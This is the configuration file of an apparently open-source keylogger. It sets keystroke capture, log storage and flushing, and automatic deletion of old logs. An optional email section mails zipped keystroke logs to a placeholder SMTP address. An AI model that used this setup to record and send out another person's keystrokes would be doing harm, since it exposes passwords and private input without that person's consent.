[general]

# set dirname to the full path of directory where you want logs to be written
dirName=C:\Temp\logdir

# Log keyboard input
hookKeyboard=True

# add linefeed [\\n] character when carriage return [\\r] character is detected (for Notepad compatibility)
addLineFeed=False

# translate backspace chacarter into printable string
parseBackspace=False

# translate escape chacarter into printable string
parseEscape=False

# specify the key to press to exit keylogger (hint: to disable key, just set to a nonexistent key)
exitKey=F12

# specify the key to press to flush write buffer to file (hint: to disable key, just set to a nonexistent key. buffer will still be flushed automatically.)
flushKey=F11

#specify one or more applications by full path name whose input will not be logged. separate multiple applications with semicolon ";".
noLog=None

# log all output to one file (filename specified here), inside directory specified with dirName, rather than to multiple files.
# leave as "None" to let logging take place to multiple files
oneFile=None

# specify the time interval between buffer autoflush events, in seconds. (used to be "interval")
flushInterval=120

# log all output, plus some debug output, to a systemlog file (filename specified here), inside directory specified with dirName
systemLog=systemlog.txt

[email]

# Set to True to enable automatic periodic emails of a zipped archive of logfiles
smtpSendEmail=False

# Set to True if your smtp server requires a login with username/password
smtpNeedsLogin=True

# Set to your username (only needed if your smtp server requires a login)
smtpUsername=yourusername

# Set to your password (only needed if your smtp server requires a password)
smtpPassword=yourpassword

# Set to the hostname of your smtp server
smtpServer=your.smtp.server

# Set to the email address that you want to appear in the "From" line in your email
smtpFrom=yourfromaddress@host.com

# Set to the email address that you want to appear in the "To" line in your email. Separate multiple addresses semicolon ";".
smtpTo=yourtoaddress@host.com

# Set to the text you want to appear in the Subject line in your email
smtpSubject=Automatic Logfile Email

# Set to the text that you want to appear in the message body of your email
smtpMessageBody=Please see attached zipfile.

# Specify the time interval between automatic log email events, in minutes (default of 4 hours = 240min)
emailInterval=240

# specify the filename for the zip archive that will be emailed to you
zipArchiveName=logzip.zip

[logmaintenance]

# Set to True to enable automatic deletion of old logs
deleteOldLogs=False

# Set to the maximum age of the logs that you want to keep, in days. Logs older than this will be deleted. (default of 2 days)
maxLogAge=2.0

# Set to the frequency of checking for and deleting logs older than maxLogAge, in hours. (default 2 hours)
ageCheckInterval=2